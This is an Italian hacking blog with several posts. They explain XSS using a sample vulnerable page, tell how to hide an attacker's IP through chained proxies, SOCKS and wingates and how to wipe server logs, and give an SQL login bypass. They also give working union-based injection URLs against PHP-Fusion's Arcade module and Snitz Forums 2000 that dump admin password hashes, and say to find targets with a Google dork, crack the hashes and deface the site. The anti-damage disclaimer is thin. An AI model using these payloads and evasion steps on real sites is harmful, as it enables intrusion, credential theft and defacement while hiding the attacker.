UnderGround0 World

Analizziamo un attacco della tipologia “Code Injection“, il Cross Site Scripting o “XSS”.

Con la tecnica XSS, possiamo attaccare sia un portale dinamico che un sito statico, il tutto si basa sull’iniezione di codice che devia il normale comportamento della piattaforma, praticamente bisogna far girare degli Script Malevoli nel sito direttamente dal browser.

Osserviamo un esempio, ecco il codice di una pagina vulnerabile:

<html>
<head>
<title>Sito Vulnerabile Cross Site Scripting “XSS”</title>
<script type=”text/javascript”>
function prova() {
var ins=prompt(”Inserisci un numero…”);
return prova;
</script>
</head>
<body>
<script type=”text/javascript”>
insert=prova();
document.write(”Il numero che hai inserito è “,insert);
</script>
</body>
</html>

Questa pagina html, contiene un piccolo JavaScript, il cui compito è quello di stampare a video, il numero che abbiamo precedentemente inserito, ad un utente smaliziato salta subito all’occhio che il codice non ha controlli, inserendo una parola tra due apici “Ciao bello”, il codice della pagina muterà in

document.write("Il numero che hai inserito è ","Ciao Bello");

così facendo abbiamo mutato il valore della variabile, fin qui niente di pericoloso, e se invece inseriamo del codice Javascript esempio:

<script>alert("Questo sito è Vulnerabile!!!")</script>

Facile, il codice sorgente muterà ancora, il risultato sarà la comparsa di una finestrella Alert con scritto “Questo sito è Vulnerabile!!!” .

Bene, per chi conosce il javascript è un gioco da ragazzi far girare qualsiasi script, pensiamo ad un cookie grabber, ovvero il furto dei cookie.

Una vulnerabilità così semplice, che spesso viene ignorata dagli Admin può portare a gravi conseguenze, si può facilmente arrivare anche al pieno controllo del portale.

Per effettuare un attacco hacker sulla rete internet è necessario adottare alcuni accorgimenti, si deve evitare che la vittima possa risalire alla fonte dell’attacco, i motivi sono abbastanza ovvi, uno dei quali è quello di non ritrovarsi la Guardia di Finanza sotto il portone di casa.

E’ d’obbligo precisare che l’anonimato totale non esiste, ma possiamo ricorrere a degli “strumenti” che ci assicurano un grado di anonimizzazione pari al 95%.

Il nostro “tallone d’Achille” è l’indirizzo IP che il nostro ISP(Fornitore Connessione) assegna in modo univoco alla nostra macchina una volta connessi alla rete internet.

Attaccare una qualsiasi applicazione web senza alcuna “maschera” è da veri e propri sprovveduti, è d’obbligo utilizzare dei “filtri” che fanno da tramite tra noi e la vittima, in modo tale che quando la vittima tenta di risalire all’attaccante, ritroverebbe solamente l’indirizzo IP del “filtro”.

PROXY

I proxy sono server di appoggio che permettono agli utilizzatori di collegarsi a loro per poter navigare senza che il proprio indirizzo IP venga loggato.

Se ad esempio un utente volesse navigare sul sito di www.google.it in modo anonimo dovrebbe digitare http://ip-del-proxy.www.google.it:80, ip-del-proxy sta per l’indirizzo del server anonimo, e 80 sta per il numero della porta utilizzata da tale server proxy, in questo modo il browser dell’utente fa richiesta al proxy di reperire per suo conto le pagine di google.

Esiste una possibilità di una concatenazione di proxy per una maggiore sicurezza, cioè utilizzare due o più proxy di seguito, ad esempio:

ATTACCANTE -> PROXY1 -> PROXY 2 -> PROXY 3 -> VITTIMA

In questo modo il browser comunicherà con il primo proxy che farà richiesta al secondo che successivamente farà richiesta al terzo che si collegherà alla vittima.

La sicurezza è notevolmente aumentata perchè anche se la vittima riuscisse a farsi rivelare l’IP dal 3^ proxy server, avremmo gli altri due a nascoderci, da sottolineare che però in questo modo si ha un calo di velocità inverosimile!

SOCKS

I socks sono dei particolari protocolli che permettono la navigazione anonima utilizzando un firewall interno, la porta di default utilizzata è la numero 1080.
Praticamente il socks non fa altro che far direzionare l’attacco dal firewall, facendo in modo che alla vittima non appaia l’IP.
La vittima cercando l’IP dell’attaccante incontra il socks che trasferisce tutto al firewall.

WINGATE

I wingate consentono una navigazione anonimizzata utilizzando la porta 23, quindi è palese che possiamo utilizzarli per nascoderci quando effettuiamo i nostri attacchi via telnet, protocollo che utilizza proprio la porta 23.

E’ prassi che l’attaccante ad attacco ultimato modifichi i file log sul server vittima per confondere le tracce e elimini i dati di navigazione anche dal proprio PC.

In rete esistono centinaia di portali che pubblicano liste contenenti indirizzi di server proxy, socks e wingate anonimi, dovete però testarli prima di utilizzarli, per accertarvi che siano veramente anonimi.

Oggi parliamo di una tecnica usata dagli Hacker e purtroppo anche da “pirati” la SQL INJECTION, altro non è che un’iniezione di codice in un database MySQL, tramite un attacco di questo tipo, ovvero con stringhe ben congeniate è facilissimo avere l’accesso non autorizzato con pieni poteri Admin su un’applicazione web.

Prendiamo ad esempio una qualsiasi pagina di login, se nel campo “userid” si immette il valore Admin e nel campo “password“ il valore passprova, la nostra query SQL sarà:


SELECT * tabella_utenti
WHERE userid = 'Admin'
AND password = 'passprova'

Questo codice è esatto ma non offre la sicurezza necessaria, proviamo a inserire una stringa ben strutturata, stiamo attenti alla posizione degl’apici, ad esempio nel campo “password” andiamo ad inserire:

1' or '1' = '1

la query risultante è la seguente:

SELECT * FROM tabella_utenti
WHERE userid = 'Admin'
AND password = '1' OR '1' = '1'

E’ facile notare cosa è successo, la query SQL grazie all’operatore OR imporrà ‘1′ = ‘1′, dato che l’uguaglianza si è verificata ecco che abbiamo l’accesso al pannello amministrativo dell’applicazione web senza conoscere userid e password.

Un altro exploit by Xoron, il bug affligge PHP-Fusion precisamente il modulo Arcade, è una remote SQL Injection.

Inanzitutto possiamo aiutare qualche webmaster sprovveduto che non ha ancora aggiornato il suo portale,

possiamo trovare siti vulnerabili con una GOOGLE DORK, facciamo una ricerca su google scrivendo: /infusions/arcade/, non appena troviamo un sito vulnerabile possiamo avvisare l’amministratore del bug.

Il bug è nell’ index.php, basta aggiungere all’indirizzo http://indirizzovittima.com/infusions/arcade/

la stringa:
index.php?op=view_game_list&cid=-1/**/union/**/select/**/

null,user_name,user_password,null,null,null/**/from/**/fusion_users/*

Aggiorniamo la pagina, se l’exploit ha funzionato il modulo Arcade ci mostrerà gli User e le password criptate in Hash MD5, copiamo i dati dell’admin, e diamo in pasto l’hash a passcracking.ru.

Non appena il cracker ci restituisce la password in chiaro, possiamo effettuare l’accesso al portale con l’account dell’Admin, possiamo defacciare il sito con un redirect ad un nostro indirizzo con una nostra grafica personalizzata che indica il bug e i possibili rimedi, mi raccomando niente danni!

Un vero hacker si limita soltando a segnalare i bug e a dare spiegazioni su come risolverli, non distrugge nulla!

Adesso vi saluto! Alla prossima! Ciau

Un exploit powered by XORON, una Remote SQL Injection Vulnerability per i Forum SNITZ 2000 v3.1 SR4.

Il funzionamento è semplcissimo, la vulnerabilità è nella pagina pop_profile.asp:

trovare l’username dell’Admin:

aggiungere all’indirizzo del forum vittima pop_profile.asp?mode=display&id=1

esempio: http://forumvittima.it/pop_profile.asp?mode=display&id=1

vi comparirà il nick dell’Admin;

trovare la password dell’Admin:

aggiungere all’indirizzo del forum vittima pop_profile.asp?

mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9

,10,11,12,13,14,15,16,17,18,19,20,21,

22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS

Ecco che compare l’hash MD5 della password, adesso basta crackarla con il cracker di milw0rm.
Voilà avete il pieno controllo del Forum!

Bye Bye